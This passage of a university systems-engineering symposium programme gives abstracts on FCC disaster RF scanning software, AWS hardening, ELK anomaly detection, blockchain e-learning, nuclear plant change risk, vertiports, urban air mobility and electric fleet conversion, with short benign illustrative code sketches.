investments for different forecasted scenarios within the 10-year time span.
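A minimal sketch of the weighted multi-attribute utility scoring is shown below; the weights come from the abstract, while the candidate items and their 0-1 attribute scores are invented for illustration.

# Weighted multi-attribute utility scoring. Weights follow the abstract
# (visual appeal, ROI, criticality, environmental impact = 0.30, 0.30,
# 0.30, 0.10); the item names and scores are invented placeholders.
WEIGHTS = {"visual_appeal": 0.30, "roi": 0.30,
           "criticality": 0.30, "environmental": 0.10}

def utility(scores):
    """scores: dict mapping each attribute to a value on a 0-1 scale."""
    return sum(WEIGHTS[attr] * scores[attr] for attr in WEIGHTS)

candidates = {
    "dock replacement": {"visual_appeal": 0.6, "roi": 0.7, "criticality": 1.0, "environmental": 0.5},
    "clubhouse roof":   {"visual_appeal": 0.4, "roi": 0.5, "criticality": 0.9, "environmental": 0.6},
    "HVAC units":       {"visual_appeal": 0.2, "roi": 0.6, "criticality": 0.8, "environmental": 0.7},
}
for name, scores in sorted(candidates.items(), key=lambda kv: -utility(kv[1])):
    print(f"{name}: utility = {utility(scores):.2f}")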

13:00-16:00 Session 2B: Software Security
Chair:
Mohamad Gebril (George Mason University, United States)
13:00
Douglas Benson (3B&T, United States)
Shantel Butterfield (3B&T, United States)
Connor Taber (3B&T, United States)
Joshua Beach (3B&T, United States)
FCC Roll Call

ABSTRACT. The Roll Call project is being conducted for the Federal Communications Commission (FCC) by team 3B&T from George Mason University (GMU). The purpose of this project is to improve the existing functionalities and interfaces of the Roll Call software. Roll Call is an RF communications solution used by engineers within disaster zones; the software aims to better coordinate disaster relief efforts, including restoration of communications systems and Federal Emergency Management Agency (FEMA) relief efforts. Engineers operating Roll Call conduct two scans, one pre-disaster and one post-disaster. Disaster relief efforts are then coordinated based on the comparison of these two scans.

The requirements for this project involve replacing the existing Windows Command Line Interface (CLI) with a Graphical User Interface (GUI). Additionally, a dashboard providing post-scan data must be implemented and viewable on-site, since reports are currently only viewable from FCC headquarters. The FCC has provided 3B&T with the necessary software, equipment, and licensing databases to deliver these requirements, which were fulfilled through proper design, testing, validation, and implementation.

The design introduces a GUI, created with PyQt5 (Python bindings for the cross-platform Qt toolkit), that allows engineers to input initial scan parameters and header information in a user-friendly environment. The GUI requests the following pre-scan information: engineer name, scan name, date, city, state (if applicable), zip code, scan length, latitude and longitude, scan radius, and preset/custom RF bands. Before and after a disaster, an engineer travels to an assigned location with the Roll Call software and equipment. After entering and verifying the information in the GUI, the engineer runs the scan on-site. At the end of each scan, the database (SQLite3) is updated and scan results are presented in an on-site dashboard containing missing and anomalous frequencies, signal plots, and a Google Earth map so relief efforts can begin immediately.

Additionally, there is a viewable Excel report containing all information entered into the GUI and output from the receiver. However, the main function of the Excel report is to organize scan information to improve and simplify the transition to the database. The database is updated after every scan, allowing it to be used in future scans to help identify anomalous frequencies. Ultimately, the new design must build upon the existing code, must not impede current functionality, must continue to operate on the Windows operating system, and must remain local (no internet connectivity).

Our software will be implemented on a laptop provided by the FCC for testing procedures. Testing was divided into two parts: GUI testing and database testing. GUI testing primarily consisted of real-world simulations covering a variety of commonly entered parameters. Additionally, program debugging practices were applied to keep vulnerabilities and program crashes to a minimum. Database testing involved a Python script that fills the database with entries to simulate long-term use of the program, checking performance on startup and anywhere else a database query is made.
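A sketch of the database load test described above might look like the following; the table schema and row counts are simplified stand-ins, not the actual Roll Call schema.

# Fill a SQLite database with synthetic scan entries to simulate long-term
# use, then time a representative query. Schema and values are stand-ins.
import random
import sqlite3
import time

con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE scans (scan_name TEXT, engineer TEXT, zip_code TEXT, "
            "frequency_mhz REAL, signal_dbm REAL)")

rows = [(f"scan_{i % 500}", "engineer", "22030",
         random.uniform(88.0, 108.0), random.uniform(-110.0, -30.0))
        for i in range(100_000)]
con.executemany("INSERT INTO scans VALUES (?, ?, ?, ?, ?)", rows)
con.commit()

start = time.perf_counter()
weak = con.execute("SELECT COUNT(*) FROM scans WHERE signal_dbm < -100").fetchone()[0]
print(f"{weak} weak-signal rows found in {time.perf_counter() - start:.4f} s")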

13:30
Edwin Hyatt III (George Mason University, United States)
Angelica Espinoza-Calvio (George Mason University, United States)
Zach Kaylor (George Mason University, United States)
Roberto Basurto (George Mason University, United States)
Nathan Mammen (George Mason University, United States)
Securing AWS Instances

ABSTRACT. Team BAHx Security was assigned to the sponsor Booz Allen Hamilton (BAH), with SME Ryan Morrell and customer Rod Wetsel. The team was tasked with securing multiple EC2 instances in an AWS environment using open-source and native AWS tools. Three EC2 instances were classified as low-risk, moderate-risk, and high-risk using NIST SP 800-60 and NIST SP 800-53. A fourth instance was assigned the role of receiving logs and sending out patches to the three data-protecting instances. The team followed the requirements set forth by the RFP, which called for the use of an AWS account throughout the duration of the project, as well as EC2 instances with sufficient computing capacity to handle the open-source tools implemented on the data-protecting instances. The open-source tools and security controls were researched and implemented on the four instances in accordance with the risk level of each instance. Once the instances were differentiated, the team designed a security architecture and data model and created a concept of operations (CONOPS) describing how the instances would be secured. The CONOPS and security architecture describe the structure of the AWS environment as three data-protecting instances containing low-, moderate-, and high-risk data, and one instance for sending patches and receiving logs. Users authenticate to the instances using public/private key pairs, and each instance has a limited set of open ports depending on its risk level. The instances reside inside a virtual private cloud (VPC) and are placed into a public or private subnet in accordance with their risk level. Additionally, the instances are placed into security groups that act as a firewall. The data model shows the three risk-based instances generating and sending logs to the fourth instance, where they are kept in storage and analyzed if necessary. The fourth instance is connected to the Internet and is responsible for periodically checking for updates needed to keep all instances patched and up to date. Once the fourth instance has fetched updates to disburse, it releases them to the other three instances at an appropriate time so as not to interrupt crucial uptime hours. Each data-protecting instance produces logs appropriate to its data classification, with the volume and detail of logging increasing for higher-risk data. To fulfill the verification method, the team will gather verification evidence for each requirement, and the project will be reviewed and verified by the BAH customer and SME against the provided requirements. The team will also provide BAH with a list of tool recommendations and analysis to assist in any future business plans the sponsor may have.
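To illustrate the risk-based port restriction, a sketch using boto3 might create one security group per risk level with a different set of allowed ingress ports; the port mapping, VPC ID, and admin CIDR below are placeholders, and credentials and region are assumed to be configured in the environment.

# Create a security group whose open ports depend on the risk level.
# The port mapping, VPC ID, and CIDR are illustrative placeholders.
import boto3

PORTS_BY_RISK = {"low": [22, 80, 443], "moderate": [22, 443], "high": [22]}

def create_risk_group(risk, vpc_id="vpc-0123456789abcdef0", cidr="203.0.113.0/24"):
    ec2 = boto3.client("ec2")
    sg = ec2.create_security_group(
        GroupName=f"{risk}-risk-sg",
        Description=f"Ingress rules for the {risk}-risk instance",
        VpcId=vpc_id,
    )
    ec2.authorize_security_group_ingress(
        GroupId=sg["GroupId"],
        IpPermissions=[
            {"IpProtocol": "tcp", "FromPort": port, "ToPort": port,
             "IpRanges": [{"CidrIp": cidr}]}
            for port in PORTS_BY_RISK[risk]
        ],
    )
    return sg["GroupId"]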

14:00
Jennah Fayyaz (George Mason University, United States)
Parham Neyzari (George Mason University, United States)
Michael Wilson (George Mason University, United States)
Anomaly Detection Analysis

ABSTRACT. Our project develops an integrated dashboard that detects and displays anomalies using the open-source ELK stack. The ELK stack consists of three components: Elasticsearch, which provides the data analysis; Logstash, which processes logs; and Kibana, which is used to build dashboards that visualize the data. Using Elasticsearch, we analyze Windows log files and use the machine learning feature to detect anomalies, allowing us to find errors or security flaws. We then use Kibana to create an integrated dashboard that allows the data to be visualized. Once an anomaly has been detected, the system alerts the person on duty and provides a mitigation suggestion to help alleviate the issue. The stakeholders in this project are the Cybersecurity and Infrastructure Security Agency (CISA) and its parent agency, the Department of Homeland Security; this work is a first step toward letting them monitor all federal departments and agencies with additional ease and security. The concept of operations is as follows: the algorithm is fed relevant data; the data is parsed, compared, and analyzed; results are displayed on the dashboard; a potential anomaly is flagged; and the SOC (Security Operations Center) analyst takes action. The requirements call for an integrated dashboard, built on Elasticsearch and Kibana, that visualizes raw data and analytics in graphs and/or charts alongside the detected anomalies, triggers alerts for those anomalies, and presents a proper course of action, such as recommended mitigations. The work is completed in series: finding data sets to be used for testing; building a cloud environment in AWS; designing and implementing the data visualization and analysis; designing and implementing an "Alerts and Recommended Actions" component; and, lastly, creating documentation that includes a user manual. The implementation takes place in an AWS cloud deployment running the Elastic software. For verification and validation, if logs are ingested, the correct anomalies are detected, and an alert is sent out, the implementation is considered successful.
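As a sketch of how the alerting logic might query for high-scoring results, the snippet below searches an Elasticsearch index for records above a score threshold; it assumes the 8.x Python client, and the index name and score field are placeholders for whatever the machine learning job actually writes.

# Pull high-scoring anomaly records from Elasticsearch for alerting.
# Index and field names are placeholders; assumes the 8.x Python client.
from elasticsearch import Elasticsearch

es = Elasticsearch("http://localhost:9200")

resp = es.search(
    index="windows-logs-anomalies",                   # placeholder index
    query={"range": {"anomaly_score": {"gte": 75}}},  # placeholder field
    sort=[{"anomaly_score": {"order": "desc"}}],
    size=20,
)
for hit in resp["hits"]["hits"]:
    doc = hit["_source"]
    print(doc.get("@timestamp"), doc.get("anomaly_score"), doc.get("host"))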

14:30
Ryan Berry (George Mason University, United States)
Benjamin Troxel (George Mason University, United States)
J.Chris Coleman (George Mason University, United States)
DAX, LLC – Project: Distributed Academic Community

ABSTRACT. The objective of this effort is to build a prototype digital academic community that demonstrates how a smart contract and blockchain architecture can be used to improve the e-learning industry. As part of this effort, a framework will be developed that includes a hierarchy of smart contracts, a blockchain architecture, and three different types of tokens to be exchanged. The stakeholder of this project is DAX LLC, and a voodoo model of operation was employed for the project's development lifecycle, with weekly testing and verification of our code. The voodoo system completes singular tasks one at a time following our design plan, allowing tasks to be easily delegated to other teams if the project is not fully completed within our group's timeline. Requirements include a classroom environment containing three distinct user types, Student, Teacher, and Sponsor, and a token system to keep track of grades and monetary compensation for both student and teacher users. This token system is attached to a blockchain architecture so that proof of work/ownership establishes a user's ownership of Grade Tokens (grades in classes) and Reward Tokens (monetary rewards earnable by both student and teacher users). Grade Tokens are stored in a blockchain system organized much like a grade book in a normal classroom, while Reward Tokens are tracked using a standard blockchain ledger. The classroom structure is module based: students complete modules created by the teacher users in a specified order to proceed through the class until "graduating" from it. Students receive proof of completion via an emailed diploma, which is tied to the environment's blockchain so that others can view the student's documented completion of the course. The classroom design was implemented as a prototype website using Python Django, applying secure coding best practices throughout the creation of this proof of concept. To test the environment, the website prototype is currently being deployed to the cloud using Amazon Web Services, where further security checks will be performed. The cost of the project is just the monthly recurring cost of the AWS instance being used, which we predict to be between $5.00 and $6.66 per month, with future scalability of that cost down the road if the environment catches on.
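The team's smart contracts are not reproduced here, but the hash-chaining idea behind the Grade Token ledger can be illustrated with a short Python sketch in which each entry commits to the previous one, so the record cannot be silently rewritten.

# Illustration of a hash-chained grade ledger (not the project's smart
# contract code): each entry stores the hash of the previous entry.
import hashlib
import json
import time

def add_entry(chain, student, module, grade):
    prev_hash = chain[-1]["hash"] if chain else "0" * 64
    entry = {"student": student, "module": module, "grade": grade,
             "timestamp": time.time(), "prev_hash": prev_hash}
    entry["hash"] = hashlib.sha256(
        json.dumps(entry, sort_keys=True).encode()).hexdigest()
    chain.append(entry)
    return chain

def verify(chain):
    for i, entry in enumerate(chain):
        expected_prev = chain[i - 1]["hash"] if i else "0" * 64
        body = {k: v for k, v in entry.items() if k != "hash"}
        recomputed = hashlib.sha256(
            json.dumps(body, sort_keys=True).encode()).hexdigest()
        if entry["prev_hash"] != expected_prev or entry["hash"] != recomputed:
            return False
    return True

ledger = []
add_entry(ledger, "student_1", "module_1", "A")
add_entry(ledger, "student_1", "module_2", "B+")
print(verify(ledger))  # True unless an entry has been tampered with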

15:00
Alyssa Lopez (George Mason University Cyber Security Engineering, United States)
Samuel Faulconer (George Mason University Cyber Security Engineering, United States)
Hissah Almarzook (George Mason University Cyber Security Engineering, United States)
Edwin Padilla-Gonzalez (George Mason University Cyber Security Engineering, United States)
No Equipment Failed/No Malicious Intent (NEF/NMI) Cyber-System Failures in Nuclear Power Plants

ABSTRACT. No Equipment Failed/No Malicious Intent (NEF/NMI) cyber-system failures are failures caused by unforeseen complications that arise from changes made to a complex system. NEF/NMI failures occur with neither equipment failure nor a malicious actor. Since complex systems generally require changes, upgrades, and modifications to both software and physical systems, organizations operating complex systems will experience NEF/NMI cyber-system failures if proper precautions are not taken prior to implementing modifications.

In 2008, the Edwin I. Hatch nuclear power plant in Georgia experienced an NEF/NMI failure when an unexpected shutdown of its second nuclear reactor occurred [1]. The shutdown was caused by a configuration change that allowed a plant employee to monitor and control the system in the production environment from their workstation. There was no equipment failure, nor was there any malicious intent behind the engineer's decision. However, no testing was performed prior to implementing the configuration change, so there was no indication that the change was safe to implement. Had the configuration change been tested to see how the system would react, this failure might have been prevented.

There are currently no specific products for detecting potential NEF/NMI failures. The goal of this research was to provide a method to aid organizations in making risk-based decisions regarding changes and updates in order to decrease the likelihood of NEF/NMI failures occurring as a result of implementing those changes and updates. In order to ensure that the proper testing is performed prior to implementing a modification to a complex system, a Decision Support System (DSS) was created to model the NEF/NMI risks of applying modifications to a Boiling Water Reactor (BWR) Nuclear Power Plant (NPP).

The DSS considers the risk of applying a modification to a Boiling Water Reactor (BWR) Nuclear Power Plant (NPP) system by using the likelihood of a failure given that the proposed modification is applied to the system and the potential impact of that failure. Based on the risk associated with the modification, the DSS recommends tiers of previously defined testing that should be performed prior to deciding to apply the change or update. Based on the results of testing, plant engineers will make a risk-based decision on whether it is safe to implement the modification to the BWR system(s).
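The DSS's actual likelihood and impact models are not reproduced here, but the mapping from a likelihood-times-impact risk score to a recommended testing tier can be sketched as follows; the scales, thresholds, and tier descriptions are illustrative assumptions.

# Illustrative risk-to-testing-tier mapping; scales and thresholds are
# assumptions, not the DSS's actual parameters.
def risk_score(likelihood, impact):
    """likelihood and impact each on a 1-5 scale."""
    return likelihood * impact

def recommended_testing(score):
    if score >= 15:
        return "Tier 3: full integration testing in an offline replica before deployment"
    if score >= 8:
        return "Tier 2: targeted regression testing of the affected subsystem"
    return "Tier 1: configuration review and unit-level checks"

# Example: a workstation-level configuration change with plant-wide impact
print(recommended_testing(risk_score(likelihood=3, impact=5)))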

This research was conducted for the Systems Engineering and Operations Research Department at George Mason University.

13:00-16:00 Session 2C: Transportation and Logistics
Chair:
Rocelle Jones (George Mason University, United States)
13:00
Megan Taylor (George Mason University, United States)
Asya Saldanli (George Mason University, Turkey)
Andy Park (George Mason University, United States)
Design of a Vertiport Design Tool

ABSTRACT. Advances in technology (e.g., electric vertical takeoff and landing (eVTOL) aircraft and machine learning guidance systems) are enabling the deployment of Urban Air Mobility (UAM) transportation systems for congested metropolitan areas with long, unreliable commutes. A UAM transportation system will enable passengers to bypass surface congestion by flying between vertiports over the congestion. A fully operational UAM transportation system in a large metropolitan area is expected to have more than 20 vertiports.

Vertiports are designed to perform the operations for the eVTOLs, including vehicle landing, passenger disembarking, post-flight check, battery swapping, maintenance, pre-flight check, and passenger embarking. These operations must take place in the available real estate and satisfy throughput requirements as well as regulations regarding noise and safety. Architecture firms designing vertiports need systems engineering support to determine the trade-offs between vertiport surface area and UAM vehicle throughput for alternate operational design configurations while considering noise and safety.

This paper describes a Vertiport Design Tool (VDT) to compare the vehicle throughput performance, surface area, vehicle wait times, noise, and safety. The analysis is conducted using a stochastic simulation of the seven vertiport operations listed above. Vertiport configurations include (1) a Multi-function Single Pad, (2) a Hybrid: with one Landing Pad and multiple Staging Pads, and (3) a Linear Sequence of Single Function Pads. The stochastic simulation is run in a Monte Carlo format to calculate vehicle throughput, vehicle queue length, vehicle wait time, the battery wait time, and the vehicle time at the vertiport. The design alternatives are compared with a Multi-Attribute Utility model including: noise, safety, and vehicle wait time. A ranking of the feasible designs and output statistics are available for each design.
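The VDT itself is not reproduced here, but the flavor of its Monte Carlo analysis can be sketched with a stripped-down single-pad model in which one vehicle at a time occupies the pad for the full landing-through-boarding cycle; the service and interarrival parameters below are placeholders, not the study's inputs.

# Stripped-down Monte Carlo of a single multi-function pad: exponential
# interarrivals, normally distributed pad-occupancy times. Parameters are
# placeholders, not the VDT's inputs.
import random

def simulate_single_pad(hours=1000, mean_interarrival_min=20.0,
                        mean_service_min=18.0, service_sd_min=3.0):
    t, pad_free_at, served, total_wait = 0.0, 0.0, 0, 0.0
    horizon = hours * 60.0
    while t < horizon:
        t += random.expovariate(1.0 / mean_interarrival_min)  # next arrival
        start = max(t, pad_free_at)                           # wait if pad busy
        total_wait += start - t
        service = max(1.0, random.gauss(mean_service_min, service_sd_min))
        pad_free_at = start + service
        served += 1
    return served / hours, total_wait / served

throughput, avg_wait = simulate_single_pad()
print(f"~{throughput:.1f} vehicles/hour, average wait {avg_wait:.1f} min")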

Analysis using the simulation shows the complex relationship between surface area and vehicle throughput. The smallest surface area for the Multi-function Single Pad design with two batteries (39 m by 69 m) generates a vehicle throughput of 3 vehicles per hour at the smallest interarrival time of 20 minutes. The smallest surface area for the Hybrid design with two batteries (64 m by 69 m) generates a vehicle throughput of 5 vehicles per hour at the smallest interarrival time of 12 minutes. The smallest surface area for the Linear Single Function Pads design with two batteries (69 m by 163 m) generates a vehicle throughput of 5 vehicles per hour at the smallest interarrival time of 11 minutes. As the surface area increases, the throughput increases while the smallest allowable interarrival time decreases.

The VDT provides architects the ability to investigate the operational performance of alternate vertiport configurations for the available surface area to meet the UAM vehicle throughput required to support the UAM transportation system. The product will be delivered as a website priced at $350,000 per product. Projected sales of 21 units over 5 years would produce a profit of $6 million, a return on investment (ROI) of 465% over 5 years, and break-even in the third year.

13:30
Benjamin Whitlow (United States Military Academy, United States)
Increasing Asset In-Transit Visibility at Fort Bragg, North Carolina

ABSTRACT. The U.S. Army maintains a ready-to-deploy unit at Fort Bragg, North Carolina that is known as the Immediate Response Force which contains more than 3,000 soldiers and hundreds of pieces of equipment. When given the order to deploy—such as the one given when the U.S. Embassy in Iraq was attacked in December 2019—the Immediate Response Force must rapidly prepare its equipment to be loaded onto aircraft and shipped overseas. Currently, these assets (containers, vehicles, pallets, etc.) are manually tracked as they move through the various steps of the deployment sequence. This process involves soldiers visually identifying assets and then reporting this information to a central location that tracks the movement of all equipment, thereby giving the unit commander an understanding of where their equipment is in the deployment process. Unfortunately, this method has significant shortcomings. It only provides commanders—the primary stakeholders in this problem—the last known position of their assets versus a real-time location. This method also consumes time and manpower, the two most valuable and finite resources the commander has. Because unit leaders are unable to know the precise location of their assets, their ability to allocate resources effectively is decreased significantly. This paper researches current technologies and identifies potential solutions to increase commanders’ in-transit visibility of deploying assets. Technologies such as radio-frequency identification (RFID), global positioning systems (GPS), and long-range wide area network (LoRaWAN) will be discussed in terms of their required infrastructure (to include gateway towers, sensors, wireless connections, and wired connections), implementation feasibility, the benefits produced by each alternative, the tradeoffs to consider with each solution’s implementation, and the validation procedures used to ensure proper functioning of each technology’s tracking system solution. A value-focused systems engineering decision process is applied to generate and evaluate each alternative solution for meeting the needs of commanders at Fort Bragg. The presented solutions show how incorporating new technologies and automating aspects of the current process can improve commanders’ visibility of critical assets and their ability to make more informed decisions.

14:00
Mary Taylor (George Mason University, United States)
Lauren Flenniken (George Mason University, United States)
Jason Nembhard (George Mason University, United States)
Anderson Barreal (George Mason University, United States)
Design of a Rapid Reliable Urban Mobility System for the Washington, D.C. Region

ABSTRACT. The Washington D.C. region is ranked 5th in the U.S. by GDP per capita, with a population of 6.1M people and a population density of 11,200 people per square mile. The region is ranked 3rd worst for traffic congestion. Travel times from airports to business districts are 160% greater than unimpeded travel times. Traffic congestion serves as a drag on the economic prosperity of the region. A confluence of technological advances enables Urban Air Mobility (UAM) transportation systems using electric Vertical Takeoff and Landing (eVTOL) vehicles and safe, secure air traffic control systems.

Analysis of travel demand profiles has identified the initial phase of developing a Rapid, Reliable Urban Mobility System (RRUMS) for the D.C. region. RRUMS provides aerial transportation connecting local airports to central business districts within 60 miles. Customers for RRUMS will be passengers arriving at and departing from airports on private jets and in first class, totaling 1,886,768 passengers per year. Other users will be business employees on tight schedules and tourists. Initially, an estimated 1% of this clientele is expected to adopt UAM. Customers will schedule their travel with RRUMS on a mobile application by entering their current location and destination; the application returns a wait time, travel time, and price. Vertiports for RRUMS were identified at Dulles Airport, Tysons Corner, Bethesda, Union Station, and National Airport.

A stochastic simulation was developed to determine the optimal fleet size and vertiport throughput required for RRUMS. The inputs and parameters to the simulation are the passenger interarrival rate, fleet size, vehicle speed, number of landing pads at each vertiport, and the number of parking spaces at each business location. Outputs include queue lengths and wait times for passengers waiting for their vehicle and for vehicles waiting for available landing pads, on-time reliability, travel time, and required battery reserve. Flight times are determined by vehicle speed and geodesic distances along predefined paths. Vehicle speed, boarding times, and vertiport operation times are random variables based on normal distributions, which makes flight time a random variable as well. Passenger arrivals follow a Poisson process, so interarrival times are exponentially distributed.
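A small sketch of these random variables is shown below: exponential interarrival times (consistent with Poisson arrivals) and flight times derived from a fixed route distance and a normally distributed cruise speed; the route distances and parameters are placeholders, not the RRUMS inputs.

# Sample the simulation's random variables: exponential interarrival times
# and flight times from distance and a normally distributed speed.
# Distances and parameters are placeholders.
import random

ROUTE_MILES = {"Dulles->Tysons": 12.0, "Tysons->Union Station": 14.5}

def sample_flight_minutes(miles, mean_mph=80.0, sd_mph=8.0):
    speed = max(40.0, random.gauss(mean_mph, sd_mph))  # truncate low outliers
    return 60.0 * miles / speed

def sample_interarrival_minutes(mean_min=30.0):
    return random.expovariate(1.0 / mean_min)

for route, miles in ROUTE_MILES.items():
    samples = [sample_flight_minutes(miles) for _ in range(10_000)]
    print(route, f"mean flight time ~ {sum(samples) / len(samples):.1f} min")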

In a case with two landing pads at each vertiport, boarding times averaging seven minutes, passenger interarrival times averaging 30 minutes, vehicle speeds averaging 80 MPH, and five parking spaces at each business location, the vehicle interarrival time is between 3.449 and 3.804 minutes, with 50 vehicles required to meet demand while keeping passenger waits for a vehicle under 20 minutes. Total flight times are between 21.792 and 22.721 minutes.

RRUMS will transport high-value travelers to airports and business districts. It is estimated to have acquisition costs of $87,625,000, annual operational costs of around $500,000, and revenue of $21,835,684 per year, yielding a profit of $40,731,840 over the first 10 years, an ROI of 19.96%, and break-even in 6 years.

14:30
Norman Au (George Mason University, United States)
Emily Chen (George Mason University, United States)
Mukand Bihari (George Mason University, United States)
O'Ryan Lattin (George Mason University, United States)
Anne Arundel County Electric Fleet Conversion

ABSTRACT. According to the EPA, the transportation sector accounted for 29% of greenhouse gas (GHG) emissions in 2017. These emissions stem from the widespread ownership of personal vehicles and a reliance on fossil fuels as an energy source. As a result, average global surface temperatures have been rising, producing what is commonly known as global warming and, with it, a surge in extreme weather events, the spread of disease, and changing ecosystems. The Intergovernmental Panel on Climate Change (IPCC) states that continued use of fossil fuels can lead to catastrophic effects if global temperatures rise by 2 degrees Celsius, but the effects can be reduced by limiting the increase to below 1.5 degrees Celsius by 2030.

Maryland has adopted the IPCC's deadline and plans to have 300,000 electric vehicles registered in the state by 2025 while reducing GHG emissions by 40% by 2030. Additionally, under the state's Renewable Portfolio Standard, 50% of the state's energy must be generated from renewable sources. Anne Arundel County, MD, has considered these goals in planning a full electric fleet conversion supported by a sufficient charging system.

All electric vehicle (EV) types have been considered in the fleet conversion: battery electric vehicles (BEVs), hybrid electric vehicles (HEVs), plug-in hybrid electric vehicles (PHEVs), and fuel-cell electric vehicles (FCEVs). Given the technological and market limitations of each EV type, four design alternatives have been proposed: All BEV; Mixed BEV, HEV, and PHEV; Mixed BEV, HEV, PHEV, and FCEV; and Do Nothing. For the mixed-fleet alternatives, an analysis has been conducted to determine which departments receive which EV type. For every design alternative, an appropriate charging system design covering EV type and number of vehicles is provided. Additionally, suggestions to reevaluate the county's current electrical infrastructure are provided to account for the increased draw on the power grid from charging electric vehicles.